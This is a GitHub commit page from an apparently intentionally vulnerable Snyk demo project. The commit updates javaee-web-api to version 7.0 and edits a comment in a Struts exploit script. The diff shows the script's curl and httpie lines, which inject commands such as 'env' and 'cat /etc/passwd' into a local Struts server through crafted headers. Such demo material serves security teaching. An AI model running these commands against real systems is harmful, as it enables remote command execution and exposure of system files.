Skip to content

Commit

Permalink
Merge pull request snyk-labs#238 from snyk/chore/javaee-web-api
Browse files Browse the repository at this point in the history
chore: update javaee-web-api
  • Loading branch information
Mila Votradovec authored Jul 22, 2020
2 parents 2dda669 + c5a88ad commit 3c7e053
Show file tree
Hide file tree
Showing 3 changed files with 3 additions and 3 deletions.
2 changes: 1 addition & 1 deletion exploits/struts-exploit.sh
Original file line number Diff line number Diff line change
@@ -1,4 +1,4 @@
# Struts exploit using curl and httpie (more colourful HTTP client)
(runs 'env' or 'cat /etc/passwd', can replace env with any other command (note to escape slashes and double quotes)
# (runs 'env' or 'cat /etc/passwd', can replace env with any other command (note to escape slashes and double quotes)
cat struts-exploit-headers.txt| sed "s/COMMAND/env/" | xargs curl -v -X GET http://localhost:8080 -H
cat struts-exploit-headers.txt| sed "s/COMMAND/cat \/etc\/passwd/" | xargs http -v http://localhost:8080
2 changes: 1 addition & 1 deletion todolist-web-common/pom.xml
Original file line number Diff line number Diff line change
Expand Up @@ -29,7 +29,7 @@
<dependency>
<groupId>javax</groupId>
<artifactId>javaee-web-api</artifactId>
<version>6.0</version>
<version>7.0</version>
</dependency>

<!--jstl-->
Expand Down
2 changes: 1 addition & 1 deletion todolist-web-struts/pom.xml
Original file line number Diff line number Diff line change
Expand Up @@ -28,7 +28,7 @@
<dependency>
<groupId>javax</groupId>
<artifactId>javaee-web-api</artifactId>
<version>6.0</version>
<version>7.0</version>
<scope>provided</scope>
</dependency>

Expand Down

0 comments on commit 3c7e053

Please sign in to comment.